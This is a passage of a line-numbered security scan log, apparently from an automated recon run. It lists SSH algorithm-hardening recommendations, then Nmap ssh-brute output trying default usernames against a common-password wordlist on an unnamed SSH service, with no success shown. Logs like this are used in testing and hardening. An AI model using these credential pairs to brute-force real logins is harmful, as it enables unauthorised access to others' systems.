2322# algorithm recommendations (for OpenSSH 6.7)
2323(rec) -ecdh-sha2-nistp521 -- kex algorithm to remove
2324(rec) -ecdh-sha2-nistp384 -- kex algorithm to remove
2325(rec) -ecdh-sha2-nistp256 -- kex algorithm to remove
2326(rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
2327(rec) -ecdsa-sha2-nistp256 -- key algorithm to remove
2328(rec) -ssh-dss -- key algorithm to remove
2329(rec) -hmac-sha2-512 -- mac algorithm to remove
2330(rec) -umac-128@openssh.com -- mac algorithm to remove
2331(rec) -hmac-sha2-256 -- mac algorithm to remove
2332(rec) -umac-64@openssh.com -- mac algorithm to remove
2333(rec) -hmac-sha1 -- mac algorithm to remove
2334(rec) -hmac-sha1-etm@openssh.com -- mac algorithm to remove
2335(rec) -umac-64-etm@openssh.com -- mac algorithm to remove
2336#######################################################################################################################################
2337Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-22 05:27 EDT
2338NSE: [ssh-run] Failed to specify credentials and command to run.
2339NSE: [ssh-brute] Trying username/password pair: root:root
2340NSE: [ssh-brute] Trying username/password pair: admin:admin
2341NSE: [ssh-brute] Trying username/password pair: administrator:administrator
2342NSE: [ssh-brute] Trying username/password pair: webadmin:webadmin
2343NSE: [ssh-brute] Trying username/password pair: sysadmin:sysadmin
2344NSE: [ssh-brute] Trying username/password pair: netadmin:netadmin
2345NSE: [ssh-brute] Trying username/password pair: guest:guest
2346NSE: [ssh-brute] Trying username/password pair: user:user
2347NSE: [ssh-brute] Trying username/password pair: web:web
2348NSE: [ssh-brute] Trying username/password pair: test:test
2349NSE: [ssh-brute] Trying username/password pair: root:
2350NSE: [ssh-brute] Trying username/password pair: admin:
2351NSE: [ssh-brute] Trying username/password pair: administrator:
2352NSE: [ssh-brute] Trying username/password pair: webadmin:
2353NSE: [ssh-brute] Trying username/password pair: sysadmin:
2354NSE: [ssh-brute] Trying username/password pair: netadmin:
2355NSE: [ssh-brute] Trying username/password pair: guest:
2356NSE: [ssh-brute] Trying username/password pair: user:
2357NSE: [ssh-brute] Trying username/password pair: web:
2358NSE: [ssh-brute] Trying username/password pair: test:
2359NSE: [ssh-brute] Trying username/password pair: root:123456
2360NSE: [ssh-brute] Trying username/password pair: admin:123456
2361NSE: [ssh-brute] Trying username/password pair: administrator:123456
2362NSE: [ssh-brute] Trying username/password pair: webadmin:123456
2363NSE: [ssh-brute] Trying username/password pair: sysadmin:123456
2364NSE: [ssh-brute] Trying username/password pair: netadmin:123456
2365NSE: [ssh-brute] Trying username/password pair: guest:123456
2366NSE: [ssh-brute] Trying username/password pair: user:123456
2367NSE: [ssh-brute] Trying username/password pair: web:123456
2368NSE: [ssh-brute] Trying username/password pair: test:123456
2369NSE: [ssh-brute] Trying username/password pair: root:12345
2370NSE: [ssh-brute] Trying username/password pair: admin:12345
2371NSE: [ssh-brute] Trying username/password pair: administrator:12345
2372NSE: [ssh-brute] Trying username/password pair: webadmin:12345
2373NSE: [ssh-brute] Trying username/password pair: sysadmin:12345
2374NSE: [ssh-brute] Trying username/password pair: netadmin:12345
2375NSE: [ssh-brute] Trying username/password pair: guest:12345
2376NSE: [ssh-brute] Trying username/password pair: user:12345
2377NSE: [ssh-brute] Trying username/password pair: web:12345
2378NSE: [ssh-brute] Trying username/password pair: test:12345
2379NSE: [ssh-brute] Trying username/password pair: root:123456789
2380NSE: [ssh-brute] Trying username/password pair: admin:123456789
2381NSE: [ssh-brute] Trying username/password pair: administrator:123456789
2382NSE: [ssh-brute] Trying username/password pair: webadmin:123456789
2383NSE: [ssh-brute] Trying username/password pair: sysadmin:123456789
2384NSE: [ssh-brute] Trying username/password pair: netadmin:123456789
2385NSE: [ssh-brute] Trying username/password pair: guest:123456789
2386NSE: [ssh-brute] Trying username/password pair: user:123456789
2387NSE: [ssh-brute] Trying username/password pair: web:123456789
2388NSE: [ssh-brute] Trying username/password pair: test:123456789
2389NSE: [ssh-brute] Trying username/password pair: root:password
2390NSE: [ssh-brute] Trying username/password pair: admin:password
2391NSE: [ssh-brute] Trying username/password pair: administrator:password
2392NSE: [ssh-brute] Trying username/password pair: webadmin:password
2393NSE: [ssh-brute] Trying username/password pair: sysadmin:password
2394NSE: [ssh-brute] Trying username/password pair: netadmin:password
2395NSE: [ssh-brute] Trying username/password pair: guest:password
2396NSE: [ssh-brute] Trying username/password pair: user:password
2397NSE: [ssh-brute] Trying username/password pair: web:password
2398NSE: [ssh-brute] Trying username/password pair: test:password
2399NSE: [ssh-brute] Trying username/password pair: root:iloveyou
2400NSE: [ssh-brute] Trying username/password pair: admin:iloveyou
2401NSE: [ssh-brute] Trying username/password pair: administrator:iloveyou
2402NSE: [ssh-brute] Trying username/password pair: webadmin:iloveyou
2403NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveyou
2404NSE: [ssh-brute] Trying username/password pair: netadmin:iloveyou
2405NSE: [ssh-brute] Trying username/password pair: guest:iloveyou
2406NSE: [ssh-brute] Trying username/password pair: user:iloveyou
2407NSE: [ssh-brute] Trying username/password pair: web:iloveyou
2408NSE: [ssh-brute] Trying username/password pair: test:iloveyou
2409NSE: [ssh-brute] Trying username/password pair: root:princess
2410NSE: [ssh-brute] Trying username/password pair: admin:princess
2411NSE: [ssh-brute] Trying username/password pair: administrator:princess
2412NSE: [ssh-brute] Trying username/password pair: webadmin:princess
2413NSE: [ssh-brute] Trying username/password pair: sysadmin:princess
2414NSE: [ssh-brute] Trying username/password pair: netadmin:princess
2415NSE: [ssh-brute] Trying username/password pair: guest:princess
2416NSE: [ssh-brute] Trying username/password pair: user:princess
2417NSE: [ssh-brute] Trying username/password pair: web:princess
2418NSE: [ssh-brute] Trying username/password pair: test:princess
2419NSE: [ssh-brute] Trying username/password pair: root:12345678
2420NSE: [ssh-brute] Trying username/password pair: admin:12345678
2421NSE: [ssh-brute] Trying username/password pair: administrator:12345678
2422NSE: [ssh-brute] Trying username/password pair: webadmin:12345678
2423NSE: [ssh-brute] Trying username/password pair: sysadmin:12345678
2424NSE: [ssh-brute] Trying username/password pair: netadmin:12345678
2425NSE: [ssh-brute] Trying username/password pair: guest:12345678
2426NSE: [ssh-brute] Trying username/password pair: user:12345678
2427NSE: [ssh-brute] Trying username/password pair: web:12345678
2428NSE: [ssh-brute] Trying username/password pair: test:12345678
2429NSE: [ssh-brute] Trying username/password pair: root:1234567
2430NSE: [ssh-brute] Trying username/password pair: admin:1234567
2431NSE: [ssh-brute] Trying username/password pair: administrator:1234567
2432NSE: [ssh-brute] Trying username/password pair: webadmin:1234567
2433NSE: [ssh-brute] Trying username/password pair: sysadmin:1234567
2434NSE: [ssh-brute] Trying username/password pair: netadmin:1234567
2435NSE: [ssh-brute] Trying username/password pair: guest:1234567
2436NSE: [ssh-brute] Trying username/password pair: user:1234567
2437NSE: [ssh-brute] Trying username/password pair: web:1234567
2438NSE: [ssh-brute] Trying username/password pair: test:1234567
2439NSE: [ssh-brute] Trying username/password pair: root:abc123
2440NSE: [ssh-brute] Trying username/password pair: admin:abc123
2441NSE: [ssh-brute] Trying username/password pair: administrator:abc123
2442NSE: [ssh-brute] Trying username/password pair: webadmin:abc123
2443NSE: [ssh-brute] Trying username/password pair: sysadmin:abc123
2444NSE: [ssh-brute] Trying username/password pair: netadmin:abc123
2445NSE: [ssh-brute] Trying username/password pair: guest:abc123
2446NSE: [ssh-brute] Trying username/password pair: user:abc123
2447NSE: [ssh-brute] Trying username/password pair: web:abc123
2448NSE: [ssh-brute] Trying username/password pair: test:abc123
2449NSE: [ssh-brute] Trying username/password pair: root:nicole
2450NSE: [ssh-brute] Trying username/password pair: admin:nicole
2451NSE: [ssh-brute] Trying username/password pair: administrator:nicole
2452NSE: [ssh-brute] Trying username/password pair: webadmin:nicole
2453NSE: [ssh-brute] Trying username/password pair: sysadmin:nicole
2454NSE: [ssh-brute] Trying username/password pair: netadmin:nicole
2455NSE: [ssh-brute] Trying username/password pair: guest:nicole
2456NSE: [ssh-brute] Trying username/password pair: user:nicole
2457NSE: [ssh-brute] Trying username/password pair: web:nicole
2458NSE: [ssh-brute] Trying username/password pair: test:nicole
2459NSE: [ssh-brute] Trying username/password pair: root:daniel
2460NSE: [ssh-brute] Trying username/password pair: admin:daniel
2461NSE: [ssh-brute] Trying username/password pair: administrator:daniel
2462NSE: [ssh-brute] Trying username/password pair: webadmin:daniel
2463NSE: [ssh-brute] Trying username/password pair: sysadmin:daniel
2464NSE: [ssh-brute] Trying username/password pair: netadmin:daniel
2465NSE: [ssh-brute] Trying username/password pair: guest:daniel
2466NSE: [ssh-brute] Trying username/password pair: user:daniel
2467NSE: [ssh-brute] Trying username/password pair: web:daniel
2468NSE: [ssh-brute] Trying username/password pair: test:daniel
2469NSE: [ssh-brute] Trying username/password pair: root:monkey
2470NSE: [ssh-brute] Trying username/password pair: admin:monkey
2471NSE: [ssh-brute] Trying username/password pair: administrator:monkey
2472NSE: [ssh-brute] Trying username/password pair: webadmin:monkey
2473NSE: [ssh-brute] Trying username/password pair: sysadmin:monkey
2474NSE: [ssh-brute] Trying username/password pair: netadmin:monkey
2475NSE: [ssh-brute] Trying username/password pair: guest:monkey
2476NSE: [ssh-brute] Trying username/password pair: user:monkey
2477NSE: [ssh-brute] Trying username/password pair: web:monkey
2478NSE: [ssh-brute] Trying username/password pair: test:monkey
2479NSE: [ssh-brute] Trying username/password pair: root:babygirl
2480NSE: [ssh-brute] Trying username/password pair: admin:babygirl
2481NSE: [ssh-brute] Trying username/password pair: administrator:babygirl
2482NSE: [ssh-brute] Trying username/password pair: webadmin:babygirl
2483NSE: [ssh-brute] Trying username/password pair: sysadmin:babygirl
2484NSE: [ssh-brute] Trying username/password pair: netadmin:babygirl
2485NSE: [ssh-brute] Trying username/password pair: guest:babygirl
2486NSE: [ssh-brute] Trying username/password pair: user:babygirl
2487NSE: [ssh-brute] Trying username/password pair: web:babygirl
2488NSE: [ssh-brute] Trying username/password pair: test:babygirl
2489NSE: [ssh-brute] Trying username/password pair: root:qwerty
2490NSE: [ssh-brute] Trying username/password pair: admin:qwerty
2491NSE: [ssh-brute] Trying username/password pair: administrator:qwerty
2492NSE: [ssh-brute] Trying username/password pair: webadmin:qwerty
2493NSE: [ssh-brute] Trying username/password pair: sysadmin:qwerty
2494NSE: [ssh-brute] Trying username/password pair: netadmin:qwerty
2495NSE: [ssh-brute] Trying username/password pair: guest:qwerty
2496NSE: [ssh-brute] Trying username/password pair: user:qwerty
2497NSE: [ssh-brute] Trying username/password pair: web:qwerty
2498NSE: [ssh-brute] Trying username/password pair: test:qwerty
2499NSE: [ssh-brute] Trying username/password pair: root:lovely
2500NSE: [ssh-brute] Trying username/password pair: admin:lovely
2501NSE: [ssh-brute] Trying username/password pair: administrator:lovely
2502NSE: [ssh-brute] Trying username/password pair: webadmin:lovely
2503NSE: [ssh-brute] Trying username/password pair: sysadmin:lovely
2504NSE: [ssh-brute] Trying username/password pair: netadmin:lovely
2505NSE: [ssh-brute] Trying username/password pair: guest:lovely
2506NSE: [ssh-brute] Trying username/password pair: user:lovely
2507NSE: [ssh-brute] Trying username/password pair: web:lovely
2508NSE: [ssh-brute] Trying username/password pair: test:lovely
2509NSE: [ssh-brute] Trying username/password pair: root:654321
2510NSE: [ssh-brute] Trying username/password pair: admin:654321
2511NSE: [ssh-brute] Trying username/password pair: administrator:654321
2512NSE: [ssh-brute] Trying username/password pair: webadmin:654321
2513NSE: [ssh-brute] Trying username/password pair: sysadmin:654321
2514NSE: [ssh-brute] Trying username/password pair: netadmin:654321
2515NSE: [ssh-brute] Trying username/password pair: guest:654321
2516NSE: [ssh-brute] Trying username/password pair: user:654321
2517NSE: [ssh-brute] Trying username/password pair: web:654321
2518NSE: [ssh-brute] Trying username/password pair: test:654321
2519NSE: [ssh-brute] Trying username/password pair: root:michael
2520NSE: [ssh-brute] Trying username/password pair: admin:michael
2521NSE: [ssh-brute] Trying username/password pair: administrator:michael
2522NSE: [ssh-brute] Trying username/password pair: webadmin:michael
2523NSE: [ssh-brute] Trying username/password pair: sysadmin:michael
2524NSE: [ssh-brute] Trying username/password pair: netadmin:michael
2525NSE: [ssh-brute] Trying username/password pair: guest:michael
2526NSE: [ssh-brute] Trying username/password pair: user:michael
2527NSE: [ssh-brute] Trying username/password pair: web:michael
2528NSE: [ssh-brute] Trying username/password pair: test:michael
2529NSE: [ssh-brute] Trying username/password pair: root:jessica
2530NSE: [ssh-brute] Trying username/password pair: admin:jessica
2531NSE: [ssh-brute] Trying username/password pair: administrator:jessica
2532NSE: [ssh-brute] Trying username/password pair: webadmin:jessica
2533NSE: [ssh-brute] Trying username/password pair: sysadmin:jessica
2534NSE: [ssh-brute] Trying username/password pair: netadmin:jessica
2535NSE: [ssh-brute] Trying username/password pair: guest:jessica
2536NSE: [ssh-brute] Trying username/password pair: user:jessica
2537NSE: [ssh-brute] Trying username/password pair: web:jessica
2538NSE: [ssh-brute] Trying username/password pair: test:jessica
2539NSE: [ssh-brute] Trying username/password pair: root:111111
2540NSE: [ssh-brute] Trying username/password pair: admin:111111
2541NSE: [ssh-brute] Trying username/password pair: administrator:111111
2542NSE: [ssh-brute] Trying username/password pair: webadmin:111111
2543NSE: [ssh-brute] Trying username/password pair: sysadmin:111111
2544NSE: [ssh-brute] Trying username/password pair: netadmin:111111
2545NSE: [ssh-brute] Trying username/password pair: guest:111111
2546NSE: [ssh-brute] Trying username/password pair: user:111111
2547NSE: [ssh-brute] Trying username/password pair: web:111111
2548NSE: [ssh-brute] Trying username/password pair: test:111111
2549NSE: [ssh-brute] Trying username/password pair: root:ashley
2550NSE: [ssh-brute] Trying username/password pair: admin:ashley
2551NSE: [ssh-brute] Trying username/password pair: administrator:ashley
2552NSE: [ssh-brute] Trying username/password pair: webadmin:ashley
2553NSE: [ssh-brute] Trying username/password pair: sysadmin:ashley
2554NSE: [ssh-brute] Trying username/password pair: netadmin:ashley
2555NSE: [ssh-brute] Trying username/password pair: guest:ashley
2556NSE: [ssh-brute] Trying username/password pair: user:ashley
2557NSE: [ssh-brute] Trying username/password pair: web:ashley
2558NSE: [ssh-brute] Trying username/password pair: test:ashley
2559NSE: [ssh-brute] Trying username/password pair: root:000000
2560NSE: [ssh-brute] Trying username/password pair: admin:000000
2561NSE: [ssh-brute] Trying username/password pair: administrator:000000
2562NSE: [ssh-brute] Trying username/password pair: webadmin:000000
2563NSE: [ssh-brute] Trying username/password pair: sysadmin:000000
2564NSE: [ssh-brute] Trying username/password pair: netadmin:000000
2565NSE: [ssh-brute] Trying username/password pair: guest:000000
2566NSE: [ssh-brute] Trying username/password pair: user:000000
2567NSE: [ssh-brute] Trying username/password pair: web:000000
2568NSE: [ssh-brute] Trying username/password pair: test:000000
2569NSE: [ssh-brute] Trying username/password pair: root:iloveu
2570NSE: [ssh-brute] Trying username/password pair: admin:iloveu
2571NSE: [ssh-brute] Trying username/password pair: administrator:iloveu
2572NSE: [ssh-brute] Trying username/password pair: webadmin:iloveu
2573NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveu
2574NSE: [ssh-brute] Trying username/password pair: netadmin:iloveu
2575NSE: [ssh-brute] Trying username/password pair: guest:iloveu
2576NSE: [ssh-brute] Trying username/password pair: user:iloveu
2577NSE: [ssh-brute] Trying username/password pair: web:iloveu
2578NSE: [ssh-brute] Trying username/password pair: test:iloveu
2579NSE: [ssh-brute] Trying username/password pair: root:michelle
2580NSE: [ssh-brute] Trying username/password pair: admin:michelle
2581NSE: [ssh-brute] Trying username/password pair: administrator:michelle
2582NSE: [ssh-brute] Trying username/password pair: webadmin:michelle
2583NSE: [ssh-brute] Trying username/password pair: sysadmin:michelle
2584NSE: [ssh-brute] Trying username/password pair: netadmin:michelle
2585NSE: [ssh-brute] Trying username/password pair: guest:michelle
2586NSE: [ssh-brute] Trying username/password pair: user:michelle
2587NSE: [ssh-brute] Trying username/password pair: web:michelle
2588NSE: [ssh-brute] Trying username/password pair: test:michelle
2589NSE: [ssh-brute] Trying username/password pair: root:tigger
2590NSE: [ssh-brute] Trying username/password pair: admin:tigger
2591NSE: [ssh-brute] Trying username/password pair: administrator:tigger
2592NSE: [ssh-brute] Trying username/password pair: webadmin:tigger
2593NSE: [ssh-brute] Trying username/password pair: sysadmin:tigger
2594NSE: [ssh-brute] Trying username/password pair: netadmin:tigger
2595NSE: [ssh-brute] Trying username/password pair: guest:tigger
2596NSE: [ssh-brute] Trying username/password pair: user:tigger
2597NSE: [ssh-brute] Trying username/password pair: web:tigger
2598NSE: [ssh-brute] Trying username/password pair: test:tigger
2599NSE: [ssh-brute] Trying username/password pair: root:sunshine
2600NSE: [ssh-brute] Trying username/password pair: admin:sunshine
2601NSE: [ssh-brute] Trying username/password pair: administrator:sunshine
2602NSE: [ssh-brute] Trying username/password pair: webadmin:sunshine
2603NSE: [ssh-brute] Trying username/password pair: sysadmin:sunshine
2604NSE: [ssh-brute] Trying username/password pair: netadmin:sunshine
2605NSE: [ssh-brute] Trying username/password pair: guest:sunshine
2606NSE: [ssh-brute] Trying username/password pair: user:sunshine
2607NSE: [ssh-brute] Trying username/password pair: web:sunshine
2608NSE: [ssh-brute] Trying username/password pair: test:sunshine
2609NSE: [ssh-brute] Trying username/password pair: root:chocolate
2610NSE: [ssh-brute] Trying username/password pair: admin:chocolate
2611NSE: [ssh-brute] Trying username/password pair: administrator:chocolate
2612NSE: [ssh-brute] Trying username/password pair: webadmin:chocolate
2613NSE: [ssh-brute] Trying username/password pair: sysadmin:chocolate
2614NSE: [ssh-brute] Trying username/password pair: netadmin:chocolate
2615NSE: [ssh-brute] Trying username/password pair: guest:chocolate
2616NSE: [ssh-brute] Trying username/password pair: user:chocolate
2617NSE: [ssh-brute] Trying username/password pair: web:chocolate
2618NSE: [ssh-brute] Trying username/password pair: test:chocolate
2619NSE: [ssh-brute] Trying username/password pair: root:password1
2620NSE: [ssh-brute] Trying username/password pair: admin:password1
2621NSE: [ssh-brute] Trying username/password pair: administrator:password1
2622NSE: [ssh-brute] Trying username/password pair: webadmin:password1
2623NSE: [ssh-brute] Trying username/password pair: sysadmin:password1
2624NSE: [ssh-brute] Trying username/password pair: netadmin:password1
2625NSE: [ssh-brute] Trying username/password pair: guest:password1
2626NSE: [ssh-brute] Trying username/password pair: user:password1
2627NSE: [ssh-brute] Trying username/password pair: web:password1
2628NSE: [ssh-brute] Trying username/password pair: test:password1
2629NSE: [ssh-brute] Trying username/password pair: root:soccer
2630NSE: [ssh-brute] Trying username/password pair: admin:soccer
2631NSE: [ssh-brute] Trying username/password pair: administrator:soccer
2632NSE: [ssh-brute] Trying username/password pair: webadmin:soccer
2633NSE: [ssh-brute] Trying username/password pair: sysadmin:soccer
2634NSE: [ssh-brute] Trying username/password pair: netadmin:soccer
2635NSE: [ssh-brute] Trying username/password pair: guest:soccer
2636NSE: [ssh-brute] Trying username/password pair: user:soccer
2637NSE: [ssh-brute] Trying username/password pair: web:soccer
2638NSE: [ssh-brute] Trying username/password pair: test:soccer
2639NSE: [ssh-brute] Trying username/password pair: root:anthony
2640NSE: [ssh-brute] Trying username/password pair: admin:anthony
2641NSE: [ssh-brute] Trying username/password pair: administrator:anthony
2642NSE: [ssh-brute] Trying username/password pair: webadmin:anthony
2643NSE: [ssh-brute] Trying username/password pair: sysadmin:anthony
2644NSE: [ssh-brute] Trying username/password pair: netadmin:anthony
2645NSE: [ssh-brute] Trying username/password pair: guest:anthony
2646NSE: [ssh-brute] Trying username/password pair: user:anthony
2647NSE: [ssh-brute] Trying username/password pair: web:anthony
2648NSE: [ssh-brute] Trying username/password pair: test:anthony
2649NSE: [ssh-brute] Trying username/password pair: root:friends
2650NSE: [ssh-brute] Trying username/password pair: admin:friends
2651NSE: [ssh-brute] Trying username/password pair: administrator:friends
2652NSE: [ssh-brute] Trying username/password pair: webadmin:friends
2653NSE: [ssh-brute] Trying username/password pair: sysadmin:friends
2654NSE: [ssh-brute] Trying username/password pair: netadmin:friends
2655NSE: [ssh-brute] Trying username/password pair: guest:friends
2656NSE: [ssh-brute] Trying username/password pair: user:friends
2657NSE: [ssh-brute] Trying username/password pair: web:friends
2658NSE: [ssh-brute] Trying username/password pair: test:friends
2659NSE: [ssh-brute] Trying username/password pair: root:purple
2660NSE: [ssh-brute] Trying username/password pair: admin:purple
2661NSE: [ssh-brute] Trying username/password pair: administrator:purple
2662NSE: [ssh-brute] Trying username/password pair: webadmin:purple
2663NSE: [ssh-brute] Trying username/password pair: sysadmin:purple
2664NSE: [ssh-brute] Trying username/password pair: netadmin:purple
2665NSE: [ssh-brute] Trying username/password pair: guest:purple
2666NSE: [ssh-brute] Trying username/password pair: user:purple
2667NSE: [ssh-brute] Trying username/password pair: web:purple
2668NSE: [ssh-brute] Trying username/password pair: test:purple
2669NSE: [ssh-brute] Trying username/password pair: root:angel
2670NSE: [ssh-brute] Trying username/password pair: admin:angel
2671NSE: [ssh-brute] Trying username/password pair: administrator:angel
2672NSE: [ssh-brute] Trying username/password pair: webadmin:angel
2673NSE: [ssh-brute] Trying username/password pair: sysadmin:angel
2674NSE: [ssh-brute] Trying username/password pair: netadmin:angel
2675NSE: [ssh-brute] Trying username/password pair: guest:angel
2676NSE: [ssh-brute] Trying username/password pair: user:angel
2677NSE: [ssh-brute] Trying username/password pair: web:angel
2678NSE: [ssh-brute] Trying username/password pair: test:angel
2679NSE: [ssh-brute] Trying username/password pair: root:butterfly
2680NSE: [ssh-brute] Trying username/password pair: admin:butterfly
2681NSE: [ssh-brute] Trying username/password pair: administrator:butterfly
2682NSE: [ssh-brute] Trying username/password pair: webadmin:butterfly
2683NSE: [ssh-brute] Trying username/password pair: sysadmin:butterfly
2684NSE: [ssh-brute] Trying username/password pair: netadmin:butterfly
2685NSE: [ssh-brute] Trying username/password pair: guest:butterfly
2686NSE: [ssh-brute] Trying username/password pair: user:butterfly
2687NSE: [ssh-brute] Trying username/password pair: web:butterfly
2688NSE: [ssh-brute] Trying username/password pair: test:butterfly
2689NSE: [ssh-brute] Trying username/password pair: root:jordan
2690NSE: [ssh-brute] Trying username/password pair: admin:jordan
2691NSE: [ssh-brute] Trying username/password pair: administrator:jordan
2692NSE: [ssh-brute] Trying username/password pair: webadmin:jordan
2693NSE: [ssh-brute] Trying username/password pair: sysadmin:jordan
2694NSE: [ssh-brute] Trying username/password pair: netadmin:jordan
2695NSE: [ssh-brute] Trying username/password pair: guest:jordan
2696NSE: [ssh-brute] Trying username/password pair: user:jordan
2697NSE: [ssh-brute] Trying username/password pair: web:jordan
2698NSE: [ssh-brute] Trying username/password pair: test:jordan
2699NSE: [ssh-brute] Trying username/password pair: root:fuckyou
2700NSE: [ssh-brute] Trying username/password pair: admin:fuckyou
2701NSE: [ssh-brute] Trying username/password pair: administrator:fuckyou
2702NSE: [ssh-brute] Trying username/password pair: webadmin:fuckyou
2703NSE: [ssh-brute] Trying username/password pair: sysadmin:fuckyou
2704NSE: [ssh-brute] Trying username/password pair: netadmin:fuckyou
2705NSE: [ssh-brute] Trying username/password pair: guest:fuckyou
2706NSE: [ssh-brute] Trying username/password pair: user:fuckyou
2707NSE: [ssh-brute] Trying username/password pair: web:fuckyou
2708NSE: [ssh-brute] Trying username/password pair: test:fuckyou
2709NSE: [ssh-brute] Trying username/password pair: root:123123
2710NSE: [ssh-brute] Trying username/password pair: admin:123123
2711NSE: [ssh-brute] Trying username/password pair: administrator:123123
2712NSE: [ssh-brute] Trying username/password pair: webadmin:123123
2713NSE: [ssh-brute] Trying username/password pair: sysadmin:123123
2714NSE: [ssh-brute] Trying username/password pair: netadmin:123123
2715NSE: [ssh-brute] Trying username/password pair: guest:123123
2716NSE: [ssh-brute] Trying username/password pair: user:123123
2717NSE: [ssh-brute] Trying username/password pair: web:123123
2718NSE: [ssh-brute] Trying username/password pair: test:123123
2719NSE: [ssh-brute] Trying username/password pair: root:justin
2720NSE: [ssh-brute] Trying username/password pair: admin:justin
2721NSE: [ssh-brute] Trying username/password pair: administrator:justin
2722NSE: [ssh-brute] Trying username/password pair: webadmin:justin
2723NSE: [ssh-brute] Trying username/password pair: sysadmin:justin
2724NSE: [ssh-brute] Trying username/password pair: netadmin:justin
2725NSE: [ssh-brute] Trying username/password pair: guest:justin
2726NSE: [ssh-brute] Trying username/password pair: user:justin
2727NSE: [ssh-brute] Trying username/password pair: web:justin
2728NSE: [ssh-brute] Trying username/password pair: test:justin
2729NSE: [ssh-brute] Trying username/password pair: root:liverpool
2730NSE: [ssh-brute] Trying username/password pair: admin:liverpool
2731NSE: [ssh-brute] Trying username/password pair: administrator:liverpool
2732NSE: [ssh-brute] Trying username/password pair: webadmin:liverpool
2733NSE: [ssh-brute] Trying username/password pair: sysadmin:liverpool
2734NSE: [ssh-brute] Trying username/password pair: netadmin:liverpool
2735NSE: [ssh-brute] Trying username/password pair: guest:liverpool
2736NSE: [ssh-brute] Trying username/password pair: user:liverpool
2737NSE: [ssh-brute] Trying username/password pair: web:liverpool
2738NSE: [ssh-brute] Trying username/password pair: test:liverpool
2739NSE: [ssh-brute] Trying username/password pair: root:football
2740NSE: [ssh-brute] Trying username/password pair: admin:football
2741NSE: [ssh-brute] Trying username/password pair: administrator:football
2742NSE: [ssh-brute] Trying username/password pair: webadmin:football
2743NSE: [ssh-brute] Trying username/password pair: sysadmin:football
2744NSE: [ssh-brute] Trying username/password pair: netadmin:football
2745NSE: [ssh-brute] Trying username/password pair: guest:football
2746NSE: [ssh-brute] Trying username/password pair: user:football
2747NSE: [ssh-brute] Trying username/password pair: web:football
2748NSE: [ssh-brute] Trying username/password pair: test:football
2749NSE: [ssh-brute] Trying username/password pair: root:loveme
2750NSE: [ssh-brute] Trying username/password pair: admin:loveme
2751NSE: [ssh-brute] Trying username/password pair: administrator:loveme
2752NSE: [ssh-brute] Trying username/password pair: webadmin:loveme
2753NSE: [ssh-brute] Trying username/password pair: sysadmin:loveme
2754NSE: [ssh-brute] Trying username/password pair: netadmin:loveme
2755NSE: [ssh-brute] Trying username/password pair: guest:loveme
2756NSE: [ssh-brute] Trying username/password pair: user:loveme
2757NSE: [ssh-brute] Trying username/password pair: web:loveme
2758NSE: [ssh-brute] Trying username/password pair: test:loveme
2759NSE: [ssh-brute] Trying username/password pair: root:secret
2760NSE: [ssh-brute] Trying username/password pair: admin:secret
2761NSE: [ssh-brute] Trying username/password pair: administrator:secret
2762NSE: [ssh-brute] Trying username/password pair: webadmin:secret
2763NSE: [ssh-brute] Trying username/password pair: sysadmin:secret
2764NSE: [ssh-brute] Trying username/password pair: netadmin:secret
2765NSE: [ssh-brute] Trying username/password pair: guest:secret
2766NSE: [ssh-brute] Trying username/password pair: user:secret
2767NSE: [ssh-brute] Trying username/password pair: web:secret
2768NSE: [ssh-brute] Trying username/password pair: test:secret
2769NSE: [ssh-brute] Trying username/password pair: root:andrea
2770NSE: [ssh-brute] Trying username/password pair: admin:andrea
2771NSE: [ssh-brute] Trying username/password pair: administrator:andrea
2772NSE: [ssh-brute] Trying username/password pair: webadmin:andrea
2773NSE: [ssh-brute] Trying username/password pair: sysadmin:andrea
2774NSE: [ssh-brute] Trying username/password pair: netadmin:andrea
2775NSE: [ssh-brute] Trying username/password pair: guest:andrea
2776NSE: [ssh-brute] Trying username/password pair: user:andrea
2777NSE: [ssh-brute] Trying username/password pair: web:andrea
2778NSE: [ssh-brute] Trying username/password pair: test:andrea
2779NSE: [ssh-brute] Trying username/password pair: root:jennifer
2780NSE: [ssh-brute] Trying username/password pair: admin:jennifer
2781NSE: [ssh-brute] Trying username/password pair: administrator:jennifer
2782NSE: [ssh-brute] Trying username/password pair: webadmin:jennifer
2783NSE: [ssh-brute] Trying username/password pair: sysadmin:jennifer
2784NSE: [ssh-brute] Trying username/password pair: netadmin:jennifer
2785NSE: [ssh-brute] Trying username/password pair: guest:jennifer
2786NSE: [ssh-brute] Trying username/password pair: user:jennifer
2787NSE: [ssh-brute] Trying username/password pair: web:jennifer
2788NSE: [ssh-brute] Trying username/password pair: test:jennifer
2789NSE: [ssh-brute] Trying username/password pair: root:joshua
2790NSE: [ssh-brute] Trying username/password pair: admin:joshua
2791NSE: [ssh-brute] Trying username/password pair: administrator:joshua
2792NSE: [ssh-brute] Trying username/password pair: webadmin:joshua
2793NSE: [ssh-brute] Trying username/password pair: sysadmin:joshua
2794NSE: [ssh-brute] Trying username/password pair: netadmin:joshua
2795NSE: [ssh-brute] Trying username/password pair: guest:joshua
2796NSE: [ssh-brute] Trying username/password pair: user:joshua
2797NSE: [ssh-brute] Trying username/password pair: web:joshua
2798NSE: [ssh-brute] Trying username/password pair: test:joshua
2799NSE: [ssh-brute] Trying username/password pair: root:carlos
2800NSE: [ssh-brute] Trying username/password pair: admin:carlos
2801NSE: [ssh-brute] Trying username/password pair: administrator:carlos
2802NSE: [ssh-brute] Trying username/password pair: webadmin:carlos
2803NSE: [ssh-brute] Trying username/password pair: sysadmin:carlos
2804NSE: [ssh-brute] Trying username/password pair: netadmin:carlos
2805NSE: [ssh-brute] Trying username/password pair: guest:carlos
2806NSE: [ssh-brute] Trying username/password pair: user:carlos
2807NSE: [ssh-brute] Trying username/password pair: web:carlos
2808NSE: [ssh-brute] Trying username/password pair: test:carlos
2809NSE: [ssh-brute] Trying username/password pair: root:superman
2810NSE: [ssh-brute] Trying username/password pair: admin:superman
2811NSE: [ssh-brute] Trying username/password pair: administrator:superman
2812NSE: [ssh-brute] Trying username/password pair: webadmin:superman
2813NSE: [ssh-brute] Trying username/password pair: sysadmin:superman
2814NSE: [ssh-brute] Trying username/password pair: netadmin:superman
2815NSE: [ssh-brute] Trying username/password pair: guest:superman
2816NSE: [ssh-brute] Trying username/password pair: user:superman
2817NSE: [ssh-brute] Trying username/password pair: web:superman
2818NSE: [ssh-brute] Trying username/password pair: test:superman
